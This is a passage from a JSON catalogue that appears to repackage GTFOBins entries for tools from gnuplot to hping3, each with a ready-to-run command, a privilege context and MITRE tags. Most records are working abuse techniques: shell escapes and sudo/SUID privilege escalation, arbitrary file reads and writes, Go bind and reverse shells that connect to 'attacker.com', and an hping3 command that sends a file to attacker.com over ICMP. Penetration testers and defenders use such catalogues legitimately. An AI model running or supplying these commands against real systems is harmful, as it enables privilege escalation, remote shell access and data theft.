installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:unprivileged","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:bind-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:bind-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-read:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-read:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-write:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-write:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:reverse-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:reverse-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grc:shell:0:sudo","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grc:shell:0:unprivileged","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:sudo","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:suid","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:unprivileged","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh -p' >/path/to/temp-file\necho 'exec /bin/sh -p 0<&1' >>/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:sudo","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:suid","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:unprivileged","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:capabilities","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:sudo","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:suid","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:unprivileged","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hashcat:file-write:0:sudo","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hashcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hashcat:file-write:0:unprivileged","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hashcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:sudo","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:suid","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:unprivileged","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hexdump:file-read:0:sudo","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hexdump:file-read:0:suid","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hexdump:file-read:0:unprivileged","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hg:shell:0:sudo","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hg:shell:0:suid","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hg:shell:0:unprivileged","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:sudo","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:suid","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:unprivileged","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:suid","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:unprivileged","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:upload:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"hping3 attacker.com --icmp --data 999 --sign xxx --file /path/to/input-file","description":"The file is continuously sent as ICMP packets (e.g., of `999` bytes), the optional `--end` parameter signals when the file reached the end.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 